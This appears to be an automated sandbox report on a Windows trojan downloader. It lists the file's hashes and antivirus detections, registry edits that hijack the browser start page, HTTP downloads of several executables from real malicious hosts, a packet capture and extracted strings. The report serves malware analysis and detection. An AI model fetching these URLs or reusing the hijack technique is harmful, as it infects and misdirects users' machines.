Analysis Date: 2014-12-23 18:07:29
MD5: 1afcd63a0c6b4161cfe7fa199bf98dad
SHA1: 1cba241fe10eb96c8e9ae427d786214f54dec1b4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: CODE md5: 4768ac006f4daf331546f8965de74c4c sha1: 2e58759eeeb8e8ad937f930495809504ecb31c9c size: 111104
Section: DATA md5: e27f5b25bd65ab61e88cbc6b5c5d9307 sha1: 48643b0a897e814be9816d8c61afb1a4d50ec5f0 size: 2048
Section: BSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .idata md5: 80d4a354669fdf7f255fade55444f403 sha1: 82f5849a5506cb2867e81e1fe7095a011af17b4d size: 3584
Section: .tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .rdata md5: 151f1b071e65a7a02daeee83cba745d8 sha1: 23e7099b5a6552164d3e69673e28340078320a46 size: 512
Section: .reloc md5: 453f8883b0741a50127a433422f47a15 sha1: eadb3573649fd4ffb22cde7f574f8c57169212d4 size: 7680
Section: .rsrc md5: a02048652481dac1b3f5ca9dc0c7e788 sha1: c07570c03825da5bb472e88712e515fba0a16768 size: 19456
Timestamp: 1992-06-19 22:22:17
Packer: Borland Delphi 4.0
PEhash: 6c9112d837b970d6fcc9995dda3d15aa0b7eff93
IMPhash: 26b87ed49d3f10064bcd5e61c061292a
AV: 360 Safe ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Ad-Aware ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Alwil (avast) ➝ Malware-gen:Win32:Malware-gen
AV: Arcabit (arcavir) ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Authentium ➝ W32/Delfloader.B.gen!Eldorado
AV: Avira (antivir) ➝ TR/ATRAPS.Gen
AV: BullGuard ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: CA (E-Trust Ino) ➝ no_virus
AV: CAT (quickheal) ➝ no_virus
AV: ClamAV ➝ no_virus
AV: Dr. Web ➝ DLOADER.Trojan
AV: Emsisoft ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Eset (nod32) ➝ Win32/StartPage.OOT
AV: Fortinet ➝ W32/StartPage.OOT!tr
AV: Frisk (f-prot) ➝ W32/Delfloader.B.gen!Eldorado
AV: F-Secure ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Grisoft (avg) ➝ Downloader.Rozena
AV: Ikarus ➝ Trojan.Win32.StartPage
AV: K7 ➝ Trojan ( 7000000f1 )
AV: Kaspersky ➝ Trojan-Downloader.Win32.Generic
AV: MalwareBytes ➝ Trojan.SelfDel
AV: Mcafee ➝ no_virus
AV: Microsoft Security Essentials ➝ no_virus
AV: MicroWorld (escan) ➝ Gen:Trojan.Heur.iGW@yPhYBUhbj
AV: Rising ➝ no_virus
AV: Sophos ➝ Mal/DelpDldr-F
AV: Symantec ➝ Trojan.Gen.2
AV: Trend Micro ➝ no_virus
AV: VirusBlokAda (vba32) ➝ no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
Registry: HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\ ➝
"C:\Program Files\Internet Explorer\iexplore.exe" http://www.9365.info\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet explorer\Main\Start Page ➝
http://www.9365.info\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\faa5_appcompat.txt
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 552
Creates Mutex: nsgdrtwnsgdrtwa
Winsock DNS: 114.215.104.141
Winsock DNS: click.t3nlink.com
Winsock DNS: down.9vh.net
Winsock DNS: 117.21.183.24
Winsock DNS: dl.3ezj.com
Winsock DNS: down.tianyunxj.com
Winsock DNS: dls.oss-cn-hangzhou.aliyuncs.com
Winsock DNS: down.chinashangrui.com
Winsock DNS: qkt.ksxbyy.com
Winsock URL: http://down.9vh.net/apples_5_1008.exe
Winsock URL: http://down.tianyunxj.com/tqrl_89_177560.exe
Winsock URL: http://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URL: http://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URL: http://dl.3ezj.com/s/QmYM_45_189315.exe
Winsock URL: http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
Winsock URL: http://click.t3nlink.com/link/140896/setup_2948-140896.exe
Winsock URL: http://down.chinashangrui.com/xxnz/xksd_50091167828.exe
Winsock URL: http://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 552

Network Details:

DNS: dls.oss-cn-hangzhou.aliyuncs.com
Type: A
112.124.219.90
DNS: down.9vh.net
Type: A
222.186.60.3
DNS: down.chinashangrui.com
Type: A
222.186.60.106
DNS: down.chinashangrui.com
Type: A
222.186.60.77
DNS: tclick.wauee.net
Type: A
120.132.61.235
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.5
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.6
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.3
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.234.4
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.2
DNS: 08911.xdwscache.glb0.lxdns.com
Type: A
8.37.235.3
DNS: qkt.ksxbyy.com
Type: A
61.155.138.216
DNS: c06.i06.arnic.hadns.net
Type: A
183.61.10.249
DNS: c06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNS: click.t3nlink.com
Type: A
DNS: dl.3ezj.com
Type: A
DNS: down.tianyunxj.com
Type: A
HTTP GET: http://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://down.9vh.net/apples_5_1008.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://down.chinashangrui.com/xxnz/xksd_50091167828.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://click.t3nlink.com/link/140896/setup_2948-140896.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://dl.3ezj.com/s/QmYM_45_189315.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://down.tianyunxj.com/tqrl_89_177560.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 112.124.219.90:80
Flows TCP: 192.168.1.1:1033 ➝ 114.215.104.141:80
Flows TCP: 192.168.1.1:1034 ➝ 117.21.183.24:80
Flows TCP: 192.168.1.1:1035 ➝ 222.186.60.3:80
Flows TCP: 192.168.1.1:1036 ➝ 222.186.60.3:80
Flows TCP: 192.168.1.1:1037 ➝ 222.186.60.3:80
Flows TCP: 192.168.1.1:1038 ➝ 222.186.60.106:80
Flows TCP: 192.168.1.1:1039 ➝ 222.186.60.106:80
Flows TCP: 192.168.1.1:1040 ➝ 222.186.60.106:80
Flows TCP: 192.168.1.1:1041 ➝ 120.132.61.235:80
Flows TCP: 192.168.1.1:1042 ➝ 120.132.61.235:80
Flows TCP: 192.168.1.1:1043 ➝ 120.132.61.235:80
Flows TCP: 192.168.1.1:1044 ➝ 8.37.235.5:80
Flows TCP: 192.168.1.1:1045 ➝ 8.37.235.5:80
Flows TCP: 192.168.1.1:1046 ➝ 8.37.235.5:80
Flows TCP: 192.168.1.1:1047 ➝ 61.155.138.216:80
Flows TCP: 192.168.1.1:1048 ➝ 61.155.138.216:80
Flows TCP: 192.168.1.1:1049 ➝ 61.155.138.216:80
Flows TCP: 192.168.1.1:1050 ➝ 183.61.10.249:80
Flows TCP: 192.168.1.1:1051 ➝ 183.61.10.249:80
Flows TCP: 192.168.1.1:1052 ➝ 183.61.10.249:80

Raw Pcap
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f747172 6c5f3839 5f313737   GET /tqrl_89_177
0x00000010 (00016)   3536302e 65786520 48545450 2f312e31   560.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f747172 6c5f3839 5f313737   GET /tqrl_89_177
0x00000010 (00016)   3536302e 65786520 48545450 2f312e31   560.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a20646f   50727)..Host: do
0x000000b0 (00176)   776e2e74 69616e79 756e786a 2e636f6d   wn.tianyunxj.com
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a 0a0d0a70   ep-Alive.......p
0x000000e0 (00224)   2d416c69 76650d0a 0d0a3732 37290d0a   -Alive....727)..
0x000000f0 (00240)   486f7374 3a203131 372e3231 2e313833   Host: 117.21.183
0x00000100 (00256)   2e32340d 0a436f6e 6e656374 696f6e3a   .24..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....


Strings

Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Ancestor for '%s' not found
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Control-C hit
December
Division by zero
DVCLAL
Error creating variant array
Error reading %s%s%s: %s
Exception in safecall method
External exception %x
Failed to get data for '%s'
Failed to set data for '%s'
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property path
Invalid property value
Invalid variant operation"Variant method calls not supported
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON(
March
Monday
No argument for format '%s'
November
October
Out of memory
PACKAGEINFO
Privileged instruction%Exception %s in module %s at %p.
Property is read-only
Property %s does not exist
Range check error
Read
Read beyond end of file	Disk full
Saturday
!'%s' is not a valid integer value
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Variant is not an array!Variant array index out of bounds
Write
                                                                
0123456789ABCDEF
-2408_1_qkt.exe
3Messages
7Project1
8Registry
advapi32.dll
apples_5_1008.exe
<B<K<}<
Boolean
CharNextA
Classes
^Classes
CloseHandle
CompareStringA
CreateDirectoryA
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
C<"u1S
CVariants
%.*ddi@
DefaultScope
del %0
DeleteCriticalSection
DeleteFileA
>(><>D>H>L>P>T>X>\>`>d>h>l>p>t>x>
DisplayName
EAbstractError
EAccessViolation
EAssertionFailed
EClassNotFound
EComponentErrort
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerErrorT
EFOpenError
EHeapException
EInOutError
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidOp
EInvalidPointer
EListError
EMathError
EnterCriticalSection
EnumCalendarInfoA
EOSError
EOutOfMemory
	EOverflow
EPrivilege
ERangeErrorPn@
EReadError
ERegistryException
ESafecallException
EStackOverflow
EStreamError
EStringListError
EUnderflow
EVariantError
EWriteError
	Exception
ExitProcess
EZeroDivide
<&<><F<
FileTimeToDosDateTime
FileTimeToLocalFileTime
FindClose
FindFirstFileA
FormatMessageA
FPUMaskValue
FreeLibrary
GetACP
GetCommandLineA
GetCPInfo
GetCurrentThreadId
GetDateFormatA
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetFileAttributesA
GetFileSize
GetFileType
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeExA
GetSystemMetrics
GetThreadLocale
GetTickCount
GetVersionExA
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
 goto try
http://114.215.104.141/hzsoft/IFoxInstall-y-c203945859-run-s-x.exe
http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
http://click.t3nlink.com/link/140896/setup_2948-140896.exe
http://dl.3ezj.com/s/QmYM_45_189315.exe
http://dls.oss-cn-hangzhou.aliyuncs.com/IFoxInstall-y-c203945859-run-s-x.exe
http://down.9vh.net/apples_5_1008.exe
http://down.chinashangrui.com/xxnz/xksd_50091167828.exe
http://down.tianyunxj.com/tqrl_89_177560.exe
http://qkt.ksxbyy.com/qukt/bind/-2408_1_qkt.exe
http://www.9365.info
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
hzsoft
hzsoft\-2408_1_qkt.exe
hzsoft\apples_5_1008.exe
hzsoft\IFoxInstall-y-c203945859-run-s-x.exe
hzsoft\QmYM_45_189315.exe
hzsoft\setup_2948-140896.exe
hzsoft\tqrl_89_177560.exe
hzsoft\xksd_50091167828.exe
.idata
if exist "
IFoxInstall-y-c203945859-run-s-x.exe
IInterface
INFNAN
IniFiles
InitializeCriticalSection
Int64Op
Integer
InterlockedDecrement
InterlockedIncrement
IStringsAdapter
kernel32.dll
KWindows
LeaveCriticalSection
LoadLibraryExA
LoadStringA
LocalAlloc
LocalFree
lstrcpynA
lstrlenA
m/d/yy
MessageBoxA
mmmm d, yyyy
:mm:ss
MultiByteToWideChar
nsgdrtw.bat
nsgdrtwnsgdrtwa
<#=O=}=
oleaut32.dll
.Owner
< <P<o<
P.reloc
Program Files\2345Explorer\Uninstall.exe
Program Files\Internet Explorer\iexplore.exe"
P.rsrc
QmYM_45_189315.exe
QTypInfo
Q<"u8S
RaiseException
.rdata
ReadFile
RealOp
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
ResetEvent
"RTLConsts
RtlUnwind
Runtime error     at 00000000
sActiveX
SafeArrayCreate
SafeArrayGetElement
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
SafeArrayPutElement
SafeArrayRedim
SetEndOfFile
SetEvent
SetFilePointer
setup_2948-140896.exe
*ShellAPI
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Internet Explorer
Software\Microsoft\Internet explorer\Main
Software\Microsoft\Internet Explorer\SearchScopes
Software\Microsoft\Internet Explorer\SearchScopes\baidu
Start Page
StringP
Strings
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
SysUtils
>S>Z>q>
<*t"<0r=<9w9i
TBoundArray
TCollection
TCollection0
TComponent
TComponentName
TCustomMemoryStream
TCustomVariantType
	TErrorRec
TExceptRec
TFiler
TFileStream|
THandleStream
This program must be run under Win32
TInterfacedObject
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TObject
TPersistent
TPersistent0
TPropFixup
TPropIntfFixup
tqrl_89_177560.exe
TReader
	TRegGroup
TRegGroups
	TRegistryS
TStream
TStringItem
TStringList
TStrings
TThreadList0
TThreadLocalCounter
TWriter
unersqa.exe
UnhandledExceptionFilter
unotcvb.exe
URLDownloadToFileA
UrlMon
URLMON.DLL
user32.dll
UTypes
>U?Y?]?a?e?i?m?q?u?y?}?
Variant
VariantChangeTypeEx
VariantClear
VariantCopy
VariantCopyInd
VariantInit
Variants
$VarUtils
Version
:<:V:f:k:
VirtualAlloc
VirtualFree
VirtualQuery
<	===W=
WaitForSingleObject
WideCharToMultiByte
WinExec
?WinInet
WinSock
WriteFile
xksd_50091167828.exe
YStrUtils